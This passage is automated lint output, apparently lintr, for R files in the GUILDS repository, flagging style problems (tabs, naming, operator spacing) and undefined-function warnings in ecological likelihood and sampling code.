^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:140:23:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L140) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  conditional_part <- calc_conditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:146:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L146) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, kda_x, kda_y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:166:9:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L166) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J,\n        ^~~~~~~~~~~~\n```\n[R/Condition.R:170:14:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L170) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  cond_ll <- calc_conditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L175) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L175) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:179:12:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L179) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:179:12:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L179) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L180) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:201:17:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L201) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:209:10:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L209) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(init_vals, g, verbose)\n         ^~~~~~~\n```\n[R/drawLocal.R:8:25:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​            return(-1 * pm_sadaux(x, I, th, j, k))\n                        ^~~~~~~~~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:11:13:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    ymax <- pm_sadaux(xmax, I, th, j, k)\n            ^~~~~~~~~\n```\n[R/drawLocal.R:12:11:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    y0 <- pm_sadaux(0, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  y[idx1] <- 0\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  y[idx1] <- Inf\n^~\n```\n[R/drawLocal.R:17:16:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​        return(pm_sadaux(x, I, th, j, k) - ymax + 1)\n               ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:22:11:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L22) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    y1 <- pm_sadaux(x1, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:23:10:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    while(ymax < (y1 + 1)) {\n         ^\n```\n[R/drawLocal.R:25:13:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​      y1 <- pm_sadaux(x1, I, th, j, k)\n            ^~~~~~~~~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:27:19:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n^~~~\n```\n[R/drawLocal.R:28:12:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n^~\n```\n[R/drawLocal.R:31:22:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n                    ~^~~\n```\n[R/drawLocal.R:31:60:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n                                                          ~^~\n```\n[R/drawLocal.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n^~\n```\n[R/drawLocal.R:32:22:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                    ~^~~\n```\n[R/drawLocal.R:32:30:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                            ~^~\n```\n[R/drawLocal.R:32:35:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                 ~^\n```\n[R/drawLocal.R:32:36:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                   ^\n```\n[R/drawLocal.R:33:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- max(0, xlft)\n^~\n```\n[R/drawLocal.R:33:22:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- max(0, xlft)\n                    ~^~~\n```\n[R/drawLocal.R:34:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n^~\n```\n[R/drawLocal.R:34:22:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                    ~^~~\n```\n[R/drawLocal.R:34:30:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                            ~^~\n```\n[R/drawLocal.R:34:35:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                                 ~^~\n```\n[R/drawLocal.R:35:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- min(1, xrgt)\n^~\n```\n[R/drawLocal.R:35:22:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- min(1, xrgt)\n                    ~^~~\n```\n[R/drawLocal.R:37:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:37:19:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n^~\n```\n[R/drawLocal.R:38:20:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L38) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n                   ^~~~~~~~~\n```\n[R/drawLocal.R:39:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n^~\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n                        ~^~~\n```\n[R/drawLocal.R:41:62:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n                                                            ~^~\n```\n[R/drawLocal.R:44:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n^\n```\n[R/drawLocal.R:44:63:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n                                                              ^\n```\n[R/drawLocal.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t# does not evaluate at the ends.\n^\n```\n[R/drawLocal.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- 1:(j - 1)  \n^\n```\n[R/drawLocal.R:46:12:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- 1:(j - 1)  \n          ~^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^~\n```\n[R/drawLocal.R:47:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n^\n```\n[R/drawLocal.R:47:14:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n            ~^~~\n```\n[R/drawLocal.R:47:35:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n                                 ~^~\n```\n[R/drawLocal.R:47:39:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L47) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n                                      ^\n```\n[R/drawLocal.R:48:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        y = k1 * res, \n^\n```\n[R/drawLocal.R:48:35:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        y = k1 * res, \n                                  ^~\n```\n[R/drawLocal.R:48:39:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L48) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t                        y = k1 * res, \n                                      ^\n```\n[R/drawLocal.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        xi = log2(k2), \n^\n```\n[R/drawLocal.R:49:36:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        xi = log2(k2), \n                                  ~^~\n```\n[R/drawLocal.R:49:40:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t                        xi = log2(k2), \n                                       ^\n```\n[R/drawLocal.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        method = \"spline\")\n^\n```\n[R/drawLocal.R:50:40:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        method = \"spline\")\n                                      ~^~\n```\n[R/drawLocal.R:51:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- c(k2, j)\n^\n```\n[R/drawLocal.R:51:12:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- c(k2, j)\n          ~^~~\n```\n[R/drawLocal.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- c(kesk, 0)\n^\n```\n[R/drawLocal.R:52:14:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- c(kesk, 0)\n            ~^~~\n```\n[R/drawLocal.R:53:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk <- kesk / k2\n^\n```\n[R/drawLocal.R:53:13:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk <- kesk / k2\n           ~^\n```\n[R/drawLocal.R:54:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n^\n```\n[R/drawLocal.R:54:17:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n               ~^~\n```\n[R/drawLocal.R:54:34:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n                                ~^~~\n```\n[R/drawLocal.R:55:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L55) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(esk)\n^\n```\n[R/drawLocal.R:61:5:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L61) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(length(idx0) > 0) {\n    ^\n```\n[R/drawLocal.R:62:42:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L62) *style:* **Put spaces around all infix operators.**\n```r\n​    aux <- log(th) + lgamma(I) - lgamma(I+j) +\n                                        ~^~\n```\n[R/drawLocal.R:69:9:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n        ^\n```\n[R/drawLocal.R:69:11:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n         ~^~\n```\n[R/drawLocal.R:69:14:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n            ~^~~\n```\n[R/drawLocal.R:69:16:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n               ^\n```\n[R/drawLocal.R:69:17:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n                ^\n```\n[R/drawLocal.R:71:27:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L71) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                          ^\n```\n[R/drawLocal.R:71:28:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L71) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                           ^\n```\n[R/drawLocal.R:71:31:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                             ~^~~\n```\n[R/drawLocal.R:71:37:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                                    ^~~\n```\n[R/drawLocal.R:73:27:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L73) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                          ^\n```\n[R/drawLocal.R:73:28:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L73) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                           ^\n```\n[R/drawLocal.R:73:31:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L73) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                             ~^~~\n```\n[R/drawLocal.R:73:37:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L73) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                                   ~^~~\n```\n[R/drawLocal.R:77:17:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L77) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  idxp <- which((x > 0) & (x < 1))\n                ^\n```\n[R/drawLocal.R:79:29:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​  aux <- log(th) + lgamma(I)-lgamma(I + j) +\n                           